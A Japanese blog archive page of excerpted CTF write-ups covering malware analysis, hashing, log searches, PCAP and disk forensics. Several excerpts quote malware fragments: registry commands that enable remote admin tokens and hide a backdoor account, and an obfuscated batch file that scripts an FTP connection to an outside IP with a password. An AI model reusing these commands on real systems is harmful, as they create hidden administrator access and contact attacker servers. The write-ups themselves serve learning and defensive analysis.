2019-11-01から1ヶ月間の記事一覧
ls -lコマンドでディレクトリ内を見てみると、. のファイル?らしきものが。 このような名前のファイルをcatで見ようとしてもエラーになるので、後ろに*をつけて見てみます。 フラグがありました。
マルウェアをStringsコマンドで実行しました。 # strings AD_OptimizationTool.exe !This program cannot be run in DOS mode. .text .data @.import hO @ hK @ h| @ AD Optimizer Optimization successfuly finished.\nThe speed increased 176%. /c net us…
問題のzipファイルを展開すると実行ファイルが出てきました。 Linux環境でsha256sum <ファイル名>でSHA256ハッシュ値(フラグ)を求めました。 # sha256sum AD_OptimizationTool.exe f24f5629be2e0f821adb36fe4d47407937f5a318bf96ae3655b628f833040f29 AD_O…
前問のパケットをみると、ファイルをアップロードしているので、その脆弱性について調べたら以下のような記事がでてきました。
アクセスしてみます。 Flagを押しても、あなたgoogleじゃないでしょ、みたいに拒否されます。 chromeで開いてるのに?? 調べてみたら、chromeでF12を押すとディベロッパーツールが開けて、そこから色々調節するみたいです。 F12→Network→NetworkConditionで…
ハッシュ値、ファイルサイズは以下のように求めました。 # md5sum AD_OptimizationTool.exe 541427a9dbe43b10c05b856cdcdc5ba6 AD_OptimizationTool.exe # sha1sum AD_OptimizationTool.exe e0fa838e0f191f97c5dac7a831af60d750432017 AD_OptimizationTool.e…
とりあえず、バイナリデータとしてダウンロードしたファイルを開きます。 最後のほうにexeファイルのURLがありました。
とりあえず、ネットでTomcatサーバの脆弱性について検索してみました。 Apache Tomcatの「Common Gateway Interface(CGI)」サーブレットに関して、遠隔からのコード実行(Remote Code Execution、RCE)の脆弱性が確認されました。この深刻度の高い脆弱性が…
# curl http://mnctf.info/mnctf2018/task/vpn20180712.log | grep vpnadmin 2018/07/13 15:01,vpnadmin,27.117.128.1 前の問題でuser名はvpnadminと分かりました。このコマンドで一発で出てきました。2018/07/13 15:01がフラグです。
標的攻撃ⅡのフラグのPPORT_388945a1をネットで検索すると、 OceanLotusというグループ(フラグ)であることが分かる。
batファイルの続きにFTPサーバーへのアクセスが見えるので、アクセスしました。 if A%USERDOMAINJkjNCIMZMscrSkoGFOOM% echo open 157.7.53.197> temp.txt echo P455w0rd>> temp.txt REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed d…
前の問題で分かっているIPをググってみます。 2018/07/13 15:01,vpnadmin,27.117.128.1 韓国でした。
zipファイルを与えられたパスワードを使って解凍しました。 batファイルがあるので、VScodeで開いてみました。 %P%@%r%e%I%c%g%h%E%o%R% %I%o%y%f%J%f%L% %d%R%f%E%R%M%z% %y%T%z%O%g%O%M%L%l% %P%N%F%A%u%M%E%E%I%:%E% %Y% %E% %F%X%b%L%b%S%S%_%W%S%l%t%K%…
/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388…
設定シートを見てみると、1階のどこかかな?とあたりがつきます。PCAPファイルをWireSharkで開きます。 locationで検索してみます。かなり絞れたのでひとつずつ見ていきます。 1F_factory(フラグ)という文字列がASCIIにありました。
ディスクイメージファイル(diskimage.vmdk )を渡されるので、FTK Imagerで削除されたファイル等がないか見てみます。 rootディレクトリを見ると、a.exe というファイルが削除された痕跡があります。右クリックしてハッシュ値を取り出します。 ハッシュ値(…
サイトにアクセスすると、 パスワードファイルの password.php と、URLを入力するとHTTPのリクエストヘッダとレスポンスヘッダを表示してくれる webchecker.php というサイトのURLがあります。 パスワードファイルはみれませんでした。webcheckerのホスト名…
標的攻撃Ⅰで見つけた怪しい実行ファイルを、FTK Imagerを使ってエクスポートします。 マルウェアを実行するのは怖いですが、、、 Linux環境でstringsコマンドで実行しました。 # strings a.EXE !This program cannot be run in DOS mode. .text .data @.impo…
まずはファイルの拡張子はpngとなっているものの、画像ファイルとして開けないので、攻撃グループBlackTechが使うマルウエアPLEADダウンローダ(ヒントのサイト)のようにバイナリエディタで開くことにしました。 いつも使っているVisual Studio Codeの拡張…